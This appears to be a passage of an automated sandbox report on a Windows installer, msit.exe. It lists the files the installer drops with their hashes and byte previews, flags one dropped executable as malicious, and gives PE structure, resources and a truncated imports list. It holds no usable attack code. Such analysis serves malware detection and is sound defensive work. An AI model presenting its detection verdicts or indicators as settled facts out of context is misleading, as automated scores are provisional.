Preview:	...@IXOS.@.....@S.-Z.@.....@.....@.....@.....@.....@......&.{15630F35-AF86-45E7-B3CF-07A0AC07CAF6}..msit..msit.msi.@.....@.....@.....@........&.{EA6270CA-0126-4785-A430-33ABC9DC920B}.....@.....@.....@.....@.......@.....@.....@.......@......msit......Rollback..Rolling back action:....RollbackCleanup..Removing backup files..File: [1]...@.......@........ProcessComponents..Updating component registration...@.....@.....@.]....&.{86FA086C-1DD0-4082-AC92-FB7682CD7E34}#.C:\Users\user\AppData\Local\Temp\.@.......@.....@.....@......&.{F6D3DE48-10AF-4734-A48F-E26E13947E6F}6.C:\Users\user\AppData\Local\Temp\TeleportPresets.txt.@.......@.....@.....@......&.{39B1484E-9A16-4754-9B1B-81931D13A2A4}d.21:\Software\Caphyon\Advanced Installer\LZMA\{15630F35-AF86-45E7-B3CF-07A0AC07CAF6}\1.0.1\AI_ExePath.@.......@.....@.....@........CreateFolders..Creating folders..Folder: [1]".#.C:\Users\user\AppData\Local\Temp\.@........InstallFiles..Copying new files&.File: [1], Directory: [9], Size: [6]...@.....@

C:\Windows\Installer\MSIA455.tmp

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	13084160
Entropy (8bit):	7.767097954057833
Encrypted:	false
SSDEEP:	196608:hL1kxR9F9KENR9N4bQOZNxVs0eb+CwRVu4fpbr7vOSPFjytXwt4TPnqunXcHF91v:uF3zv8Zrqb+CUuubX26jytnTPjnXcBv
MD5:	4D82074854750FDBA89D76624CC1E6F6
SHA1:	1CAB8150956317418F64E67692072CAC8472B75B
SHA-256:	019CF1AAD1F8D4F1B5DAE3AA609B2B53CFFC3C7894B58B9F0B225868AED7342D
SHA-512:	068BD8C1DB17C4DEF612618D463239F002E8F4712691A8FC9163215BDAA7BC5306AA861C396438C647E7B839C2C67C5709B25E0695E1BAA668AA100310255F9D
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 63%
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d.....[g.........."................X].........@.............................0......g.....`..................................................n..(................2.......................................... e..(......@............q...............................text............................... ..`.rdata............................@..@.data....I....... ..................@....pdata...2.......4..................@..@.fptable.....P......................@....tls.........`......................@..._RDATA.......p......................@..@.rsrc...............................@..@.reloc..............................@..B................................................................................................................................................................................................................................................................

C:\Windows\Installer\SourceHash{15630F35-AF86-45E7-B3CF-07A0AC07CAF6}

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	Composite Document File V2 Document, Cannot read section info
Category:	dropped
Size (bytes):	20480
Entropy (8bit):	1.2024165827474182
Encrypted:	false
SSDEEP:	12:JSbX72FjjXAlfLIlHuRpzhG7777777777777777777777777ZDHF9N0ynYcowbrB:JdUIwqRo+F
MD5:	E791010B969957764959617392A4B91A
SHA1:	E772884207D12A3B69E72BADAAED4325F04F1CA7
SHA-256:	FA0A4FFEB5F43928874C5D42AB246AD7BB1523388DF427FBAB7B5B8FA1A1C85B
SHA-512:	101D4A07D5AC01D0638D62A8F24B1CE0CB934E0FF31F6EE5E7E15683268C4DEC80F685D3BAEBC311CD1A981001F999A3A66F5F87BCB930D0C4273F0799BF2858
Malicious:	false
Preview:	......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\Installer\inprogressinstallinfo.ipi

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	Composite Document File V2 Document, Cannot read section info
Category:	dropped
Size (bytes):	20480
Entropy (8bit):	1.6836575987345794
Encrypted:	false
SSDEEP:	48:AvB8PhQuRc06WX4SnT5lI2rR3WSXsAEXMGRFDbtM9mSXqTO:AUhQ1CnTzILmnGRxQ
MD5:	58E14BD231E71EEF1D276C0FA03483D2
SHA1:	D73751D16178B38D32B931E1EA17B64BFCC5CD2A
SHA-256:	22F506CD03BE096B2DB9D692497564814C189A2193EC53C931568AC771174F54
SHA-512:	676BF44F1EFD9333EC2EEE700591B0D938E3A9497F6CF0B67BB16582B307EB2147C2CB10484603CC04508DAEA76ACF5AF386F7D7454167BC2989D31589B5E979
Malicious:	false
Preview:	......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.log

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
Category:	dropped
Size (bytes):	360001
Entropy (8bit):	5.362967270052912
Encrypted:	false
SSDEEP:	1536:6qELG7gK+RaOOp3LCCpfmLgYI66xgFF9Sq8K6MAS2OMUHl6Gin327D22A26Kgaup:zTtbmkExhMJCIpEc
MD5:	2A0D70B725A9470D484B8176AB4EA097
SHA1:	63903DB30C634B018CC2112CCBE67CD9A5830DE7
SHA-256:	256D5518284BDA940F80CBAB6FB39DA8EAA1FB046CD182A0BC8241DA7A9A0C95
SHA-512:	D27A1480E6358A715DA0F37CA9066A2B87BB295A4D1A4C2F0F23DA8CE38DE456B4DFB8A6563FF612BF50725E4D3CCF98606B98A499EAC980CB29A46CD41C1925
Malicious:	false
Preview:	.To learn about increasing the verbosity of the NGen log files please see http://go.microsoft.com/fwlink/?linkid=210113..12/07/2019 14:54:22.458 [5488]: Command line: D:\wd\compilerTemp\BMT.200yuild.1bk\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe executeQueuedItems /nologo ..12/07/2019 14:54:22.473 [5488]: Executing command from offline queue: install "System.Runtime.WindowsRuntime.UI.Xaml, Version=4.0.0.0, Culture=Neutral, PublicKeyToken=b77a5c561934e089, processorArchitecture=msil" /NoDependencies /queue:1..12/07/2019 14:54:22.490 [5488]: Executing command from offline queue: install "System.Web.ApplicationServices, Version=4.0.0.0, Culture=Neutral, PublicKeyToken=31bf3856ad364e35, processorArchitecture=msil" /NoDependencies /queue:3..12/07/2019 14:54:22.490 [5488]: Exclusion list entry found for System.Web.ApplicationServices, Version=4.0.0.0, Culture=Neutral, PublicKeyToken=31bf3856ad364e35, processorArchitecture=msil; it will not be installed..12/07/2019 14:54:22.490 [

C:\Windows\Temp\~DF1F5548A3D2C8C018.TMP

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	Composite Document File V2 Document, Cannot read section info
Category:	dropped
Size (bytes):	20480
Entropy (8bit):	1.6836575987345794
Encrypted:	false
SSDEEP:	48:AvB8PhQuRc06WX4SnT5lI2rR3WSXsAEXMGRFDbtM9mSXqTO:AUhQ1CnTzILmnGRxQ
MD5:	58E14BD231E71EEF1D276C0FA03483D2
SHA1:	D73751D16178B38D32B931E1EA17B64BFCC5CD2A
SHA-256:	22F506CD03BE096B2DB9D692497564814C189A2193EC53C931568AC771174F54
SHA-512:	676BF44F1EFD9333EC2EEE700591B0D938E3A9497F6CF0B67BB16582B307EB2147C2CB10484603CC04508DAEA76ACF5AF386F7D7454167BC2989D31589B5E979
Malicious:	false
Preview:	......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\Temp\~DF262EBF702E9B6141.TMP

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	data
Category:	dropped
Size (bytes):	512
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3::
MD5:	BF619EAC0CDF3F68D496EA9344137E8B
SHA1:	5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
SHA-256:	076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
SHA-512:	DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
Malicious:	false
Preview:	................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\Temp\~DF3B3CABAE9A4435DF.TMP

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	data
Category:	dropped
Size (bytes):	32768
Entropy (8bit):	0.09962821282146958
Encrypted:	false
SSDEEP:	6:xPLG7iVCnLG7iVrKOzPLHKO9NrgEbu1tIWMYcCt2XbPYVky6l0Sa1:50i8n0itFzDHF9N0ynYcowbr0Z1
MD5:	6F1A2F92A8ECD382F77DC249992D76EA
SHA1:	5F3CDA9B7E94305EEE9AC96E389AF8AB66164297
SHA-256:	F434FAB927629CABCAD69C315CA18DBC0CC872E82C4999F4BFBC94528EB3A5C8
SHA-512:	0CEFE5A45DE243C25651113AC85725CDE8F7DF1652EABE3EC8E6710F3D44D3E0D68C973AE1E6A085E3AB9018CB4935B8457602B81B81E2043FD9D9D3A89979EC
Malicious:	false
Preview:	........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\Temp\~DF43C36A2060DAD11D.TMP

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	data
Category:	modified
Size (bytes):	512
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3::
MD5:	BF619EAC0CDF3F68D496EA9344137E8B
SHA1:	5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
SHA-256:	076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
SHA-512:	DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
Malicious:	false
Preview:	................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\Temp\~DF4B4C80442AE09A29.TMP

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	Composite Document File V2 Document, Cannot read section info
Category:	dropped
Size (bytes):	32768
Entropy (8bit):	1.339607743296539
Encrypted:	false
SSDEEP:	48:Lm1YuBvhPIFX4BT53o5I2rR3WSXsAEXMGRFDbtM9mSXqTO:LaYcIiT5KILmnGRxQ
MD5:	788FD3E0775CC59234105B1145F38ED9
SHA1:	91D4F761F88D24CE19200D32492A34E2B146D749
SHA-256:	1B80BCC64DA96560C6C91E2BDB1121E813092160BA3F18B64D3E7C9361E14ECC
SHA-512:	F08AC2733F06750A17EDA22448274AA6CB94281C7E63CF98F8F99C9E9DC3FF039EAF8A18827C1947763AB946CF47932DA579BDE87306C4DCA943262876649AD7
Malicious:	false
Preview:	......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\Temp\~DF50F10A599CF4908C.TMP

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	Composite Document File V2 Document, Cannot read section info
Category:	dropped
Size (bytes):	32768
Entropy (8bit):	1.339607743296539
Encrypted:	false
SSDEEP:	48:Lm1YuBvhPIFX4BT53o5I2rR3WSXsAEXMGRFDbtM9mSXqTO:LaYcIiT5KILmnGRxQ
MD5:	788FD3E0775CC59234105B1145F38ED9
SHA1:	91D4F761F88D24CE19200D32492A34E2B146D749
SHA-256:	1B80BCC64DA96560C6C91E2BDB1121E813092160BA3F18B64D3E7C9361E14ECC
SHA-512:	F08AC2733F06750A17EDA22448274AA6CB94281C7E63CF98F8F99C9E9DC3FF039EAF8A18827C1947763AB946CF47932DA579BDE87306C4DCA943262876649AD7
Malicious:	false
Preview:	......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\Temp\~DF530FB337377DF480.TMP

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	data
Category:	dropped
Size (bytes):	512
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3::
MD5:	BF619EAC0CDF3F68D496EA9344137E8B
SHA1:	5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
SHA-256:	076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
SHA-512:	DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
Malicious:	false
Preview:	................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\Temp\~DF5717DA4A78A6D471.TMP

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	data
Category:	dropped
Size (bytes):	512
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3::
MD5:	BF619EAC0CDF3F68D496EA9344137E8B
SHA1:	5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
SHA-256:	076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
SHA-512:	DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
Malicious:	false
Preview:	................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\Temp\~DF85513C8D331FE333.TMP

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	data
Category:	dropped
Size (bytes):	512
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3::
MD5:	BF619EAC0CDF3F68D496EA9344137E8B
SHA1:	5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
SHA-256:	076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
SHA-512:	DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
Malicious:	false
Preview:	................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\Temp\~DF903E8E85FD47F3DA.TMP

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	Composite Document File V2 Document, Cannot read section info
Category:	dropped
Size (bytes):	20480
Entropy (8bit):	1.6836575987345794
Encrypted:	false
SSDEEP:	48:AvB8PhQuRc06WX4SnT5lI2rR3WSXsAEXMGRFDbtM9mSXqTO:AUhQ1CnTzILmnGRxQ
MD5:	58E14BD231E71EEF1D276C0FA03483D2
SHA1:	D73751D16178B38D32B931E1EA17B64BFCC5CD2A
SHA-256:	22F506CD03BE096B2DB9D692497564814C189A2193EC53C931568AC771174F54
SHA-512:	676BF44F1EFD9333EC2EEE700591B0D938E3A9497F6CF0B67BB16582B307EB2147C2CB10484603CC04508DAEA76ACF5AF386F7D7454167BC2989D31589B5E979
Malicious:	false
Preview:	......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\Temp\~DFDFF3673761E70AB1.TMP

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	Composite Document File V2 Document, Cannot read section info
Category:	dropped
Size (bytes):	32768
Entropy (8bit):	1.339607743296539
Encrypted:	false
SSDEEP:	48:Lm1YuBvhPIFX4BT53o5I2rR3WSXsAEXMGRFDbtM9mSXqTO:LaYcIiT5KILmnGRxQ
MD5:	788FD3E0775CC59234105B1145F38ED9
SHA1:	91D4F761F88D24CE19200D32492A34E2B146D749
SHA-256:	1B80BCC64DA96560C6C91E2BDB1121E813092160BA3F18B64D3E7C9361E14ECC
SHA-512:	F08AC2733F06750A17EDA22448274AA6CB94281C7E63CF98F8F99C9E9DC3FF039EAF8A18827C1947763AB946CF47932DA579BDE87306C4DCA943262876649AD7
Malicious:	false
Preview:	......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\Temp\~DFE80CCC0D708006F6.TMP

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	data
Category:	dropped
Size (bytes):	73728
Entropy (8bit):	0.18122162238988607
Encrypted:	false
SSDEEP:	24:PaJTxtmipVtktRFdWipVtsAEVtMG+l8T4gC2rhKiVPpG+ItQH5MFI+Z5Tu6:SJTbmSX8R3WSXsAEXMGRFDbtMFIi
MD5:	FBCD81C4FBCAB01F71828A6110D0753B
SHA1:	AFAB92D26B19F1504A0EFC582EDF2079A7BD4C18
SHA-256:	3ECF8FCCE2F1AE29752446C010FB5D19770C5B421CC8DA20DD8C424B22147097
SHA-512:	0E9D97829ABA271882963486EFDC967D44E060ACCC1AE63CEE966BA903F58924EBD27F5AC0E12EC3A2C925FD04AA918DCD629501314A49A0EA32CB66F8F925A0
Malicious:	false
Preview:	........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	7.875224146026472
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	msit.exe
File size:	20'182'372 bytes
MD5:	bb0ca87d28e7c1bfd53e3e592e75e684
SHA1:	23be4528fe7dd78243845a6a08a88ce68200d59a
SHA256:	d34e7af4d266688eb65118de606ffbeb36d46d488c3be604a5cb240778550cea
SHA512:	217effd932ae2b5e21527bcc7a22c0f8a8ae0d89902ef00669ef9cc11463995c8c48d34d0b75b55dd50421c2abf19e8b72289abfbb7757339f825fe6ccdb59a7
SSDEEP:	393216:kxVUrUl7eOos7orHgF4n5tZkk5b4EMqbfhYwWMr220ItXVca6cjL6OcaAeEKQHeg:CVUrUl7eOuTg4VkDEMq1YpItB6YOO1Af
TLSH:	8A171221764AC4EBED6911F0193C9AAA852C6D3B1B6118D7B3DC6D6E17740C38633E3B
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........Z...4...4...4...1.S.4...2...4...7...4...0...4...1...4...7...4...0...4...5...4...3...4...5.g.4...=...4.......4.......4...6...4

File Icon


Icon Hash:	010905619293c52c

Static PE Info

General

Entrypoint:	0x631960
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
Time Stamp:	0x66FBEEB8 [Tue Oct 1 12:44:40 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	6
OS Version Minor:	0
File Version Major:	6
File Version Minor:	0
Subsystem Version Major:	6
Subsystem Version Minor:	0
Import Hash:	bf586bdf1219cc9e9d753db3e77887ee

Entrypoint Preview

Instruction
call 00007F2490C3BC8Bh
jmp 00007F2490C3B2EDh
mov ecx, dword ptr [ebp-0Ch]
mov dword ptr fs:[00000000h], ecx
pop ecx
pop edi
pop edi
pop esi
pop ebx
mov esp, ebp
pop ebp
push ecx
ret
mov ecx, dword ptr [ebp-10h]
xor ecx, ebp
call 00007F2490C3AA47h
jmp 00007F2490C3B452h
push eax
push dword ptr fs:[00000000h]
lea eax, dword ptr [esp+0Ch]
sub esp, dword ptr [esp+0Ch]
push ebx
push esi
push edi
mov dword ptr [eax], ebp
mov ebp, eax
mov eax, dword ptr [007820C0h]
xor eax, ebp
push eax
push dword ptr [ebp-04h]
mov dword ptr [ebp-04h], FFFFFFFFh
lea eax, dword ptr [ebp-0Ch]
mov dword ptr fs:[00000000h], eax
ret
push eax
push dword ptr fs:[00000000h]
lea eax, dword ptr [esp+0Ch]
sub esp, dword ptr [esp+0Ch]
push ebx
push esi
push edi
mov dword ptr [eax], ebp
mov ebp, eax
mov eax, dword ptr [007820C0h]
xor eax, ebp
push eax
mov dword ptr [ebp-10h], eax
push dword ptr [ebp-04h]
mov dword ptr [ebp-04h], FFFFFFFFh
lea eax, dword ptr [ebp-0Ch]
mov dword ptr fs:[00000000h], eax
ret
push eax
push dword ptr fs:[00000000h]
lea eax, dword ptr [esp+0Ch]
sub esp, dword ptr [esp+0Ch]
push ebx
push esi
push edi
mov dword ptr [eax], ebp
mov ebp, eax
mov eax, dword ptr [007820C0h]
xor eax, ebp
push eax
mov dword ptr [ebp-10h], esp
push dword ptr [ebp-04h]
mov dword ptr [ebp-04h], FFFFFFFFh
lea eax, dword ptr [ebp-0Ch]
mov dword ptr fs:[00000000h], eax

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x380c70	0x3c	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x392000	0x2fa70	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x3c2000	0x30668	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x31df1c	0x70	.rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x31dfc0	0x18	.rdata
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x2ed3d0	0x40	.rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x2c7000	0x348	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x37df34	0x240	.rdata
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x2c57ca	0x2c5800	380eea416b4c49312a5c8286c01b4064	unknown	unknown	unknown	unknown	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata	0x2c7000	0xbaf98	0xbb000	76d9a806840fa1b0d85e274708829c84	False	0.3255177870153743	PEX Binary Archive	5.068606859404956	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0x382000	0xd960	0x3600	3218144f404d047556acfc87dc4dc877	False	0.2339409722222222	dBase III DBT, version number 0, next free block index 2, 1st item "T"x"	4.467231983876358	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.didat	0x390000	0x70c	0x800	040200ef5edc5b299fac3839947e3015	False	0.41162109375	data	4.648805056387306	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.fptable	0x391000	0x80	0x200	bf619eac0cdf3f68d496ea9344137e8b	False	0.02734375	data	0.0	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0x392000	0x2fa70	0x2fc00	4f793859b16bf05cbc7b417183359276	False	0.11481000490837696	data	5.128026163629013	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x3c2000	0x30668	0x30800	70c4f913553752a0f8a4e9db7b74cbe4	False	0.4799704010953608	data	6.572194138609192	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_BITMAP	0x392910	0x13e	Device independent bitmap graphic, 32 x 16 x 4, image size 258, resolution 2834 x 2834 px/m, 5 important colors	English	United States	0.25471698113207547
RT_BITMAP	0x392a50	0x828	Device independent bitmap graphic, 32 x 16 x 32, image size 0	English	United States	0.03017241379310345
RT_BITMAP	0x393278	0x48a8	Device independent bitmap graphic, 290 x 16 x 32, image size 0	English	United States	0.11881720430107527
RT_BITMAP	0x397b20	0xa6a	Device independent bitmap graphic, 320 x 16 x 4, image size 2562, resolution 2834 x 2834 px/m	English	United States	0.21680420105026257
RT_BITMAP	0x39858c	0x152	Device independent bitmap graphic, 32 x 16 x 4, image size 258, resolution 2834 x 2834 px/m, 10 important colors	English	United States	0.5295857988165681
RT_BITMAP	0x3986e0	0x828	Device independent bitmap graphic, 32 x 16 x 32, image size 0	English	United States	0.4875478927203065
RT_ICON	0x398f08	0x4228	Device independent bitmap graphic, 64 x 128 x 32, image size 16896	English	United States	0.07422059518186112
RT_ICON	0x39d130	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 9600	English	United States	0.08703319502074688
RT_ICON	0x39f6d8	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 4224	English	United States	0.16463414634146342
RT_ICON	0x3a0780	0x988	Device independent bitmap graphic, 24 x 48 x 32, image size 2400	English	United States	0.18565573770491803
RT_ICON	0x3a1108	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 1088	English	United States	0.3262411347517731
RT_DIALOG	0x3a1570	0xac	data	English	United States	0.7151162790697675
RT_DIALOG	0x3a161c	0xcc	data	English	United States	0.6911764705882353
RT_DIALOG	0x3a16e8	0x1b4	data	English	United States	0.5458715596330275
RT_DIALOG	0x3a189c	0x136	data	English	United States	0.6064516129032258
RT_DIALOG	0x3a19d4	0x4c	data	English	United States	0.8289473684210527
RT_STRING	0x3a1a20	0x234	data	English	United States	0.4645390070921986
RT_STRING	0x3a1c54	0x182	data	English	United States	0.5103626943005182
RT_STRING	0x3a1dd8	0x50	data	English	United States	0.7375
RT_STRING	0x3a1e28	0x9a	data	English	United States	0.37662337662337664
RT_STRING	0x3a1ec4	0x2f6	data	English	United States	0.449868073878628
RT_STRING	0x3a21bc	0x5c0	data	English	United States	0.3498641304347826
RT_STRING	0x3a277c	0x434	data	English	United States	0.32899628252788105
RT_STRING	0x3a2bb0	0x100	data	English	United States	0.5703125
RT_STRING	0x3a2cb0	0x484	data	English	United States	0.39186851211072665
RT_STRING	0x3a3134	0x1ea	data	English	United States	0.44081632653061226
RT_STRING	0x3a3320	0x18a	data	English	United States	0.5228426395939086
RT_STRING	0x3a34ac	0x216	Matlab v4 mat-file (little endian) n, numeric, rows 0, columns 0	English	United States	0.46254681647940077
RT_STRING	0x3a36c4	0x624	data	English	United States	0.3575063613231552
RT_STRING	0x3a3ce8	0x660	data	English	United States	0.3474264705882353
RT_STRING	0x3a4348	0x41a	data	English	United States	0.38095238095238093
RT_GROUP_ICON	0x3a4764	0x4c	data	English	United States	0.8026315789473685
RT_VERSION	0x3a47b0	0x294	OpenPGP Secret Key	English	United States	0.4712121212121212
RT_HTML	0x3a4a44	0x3835	ASCII text, with very long lines (443), with CRLF line terminators	English	United States	0.08298005420807561
RT_HTML	0x3a827c	0x1316	ASCII text, with CRLF line terminators	English	United States	0.18399508800654932
RT_HTML	0x3a9594	0x8c77	HTML document, ASCII text, with CRLF line terminators	English	United States	0.08081426068578103
RT_HTML	0x3b220c	0x6acd	HTML document, ASCII text, with CRLF line terminators	English	United States	0.10679931238798873
RT_HTML	0x3b8cdc	0x679	HTML document, ASCII text, with CRLF line terminators	English	United States	0.34339167169583584
RT_HTML	0x3b9358	0x104a	HTML document, ASCII text, with CRLF line terminators	English	United States	0.2170263788968825
RT_HTML	0x3ba3a4	0x15b1	HTML document, ASCII text, with CRLF line terminators	English	United States	0.17612101566720692
RT_HTML	0x3bb958	0x2099	exported SGML document, ASCII text, with very long lines (659), with CRLF line terminators	English	United States	0.13732774116237267
RT_HTML	0x3bd9f4	0x368d	HTML document, ASCII text, with CRLF line terminators	English	United States	0.10834228428213391
RT_HTML	0x3c1084	0x1d7	ASCII text, with CRLF line terminators	English	United States	0.6008492569002123
RT_MANIFEST	0x3c125c	0x813	XML 1.0 document, ASCII text, with CRLF line terminators	English	United States	0.41025641025641024

Imports

DLL

Import

KERNEL32.dll

WriteFile, DeleteFileW, HeapDestroy, HeapSize, HeapReAlloc, HeapFree, HeapAlloc, GetProcessHeap, SizeofResource, LockResource, LoadResource, FindResourceW, FindResourceExW, CreateEventExW, WaitForSingleObject, CreateProcessW, GetLastError, GetExitCodeProcess, SetEvent, RemoveDirectoryW, GetProcAddress, GetModuleHandleW, GetWindowsDirectoryW, CreateDirectoryW, GetTempPathW, GetTempFileNameW, MoveFileW, EnterCriticalSection, LeaveCriticalSection, GetModuleFileNameW, DeleteCriticalSection, InitializeCriticalSectionAndSpinCount, GetCurrentThreadId, RaiseException, SetLastError, GlobalUnlock, GlobalLock, GlobalAlloc, MulDiv, lstrcmpW, CreateEventW, FindClose, FindFirstFileW, GetFullPathNameW, InitializeCriticalSection, lstrcpynW, CloseHandle, GetLogicalDriveStringsW, GetDriveTypeW, GetDiskFreeSpaceExW, Sleep, LoadLibraryExW, FreeLibrary, GetCurrentProcess, WideCharToMultiByte, GetSystemDirectoryW, GetCurrentProcessId, DecodePointer, CreateToolhelp32Snapshot, Process32FirstW, Process32NextW, CreateNamedPipeW, GetExitCodeThread, lstrlenW, VerifyVersionInfoW, VerSetConditionMask, lstrcmpiW, LoadLibraryW, CompareStringW, FindNextFileW, GetFileSize, GetFileAttributesW, GetShortPathNameW, GetFinalPathNameByHandleW, SetFileAttributesW, GetFileTime, CopyFileW, ReadFile, SetFilePointer, SetFileTime, SystemTimeToFileTime, MultiByteToWideChar, GetSystemInfo, WaitForMultipleObjects, GetVersionExW, CreateSemaphoreW, 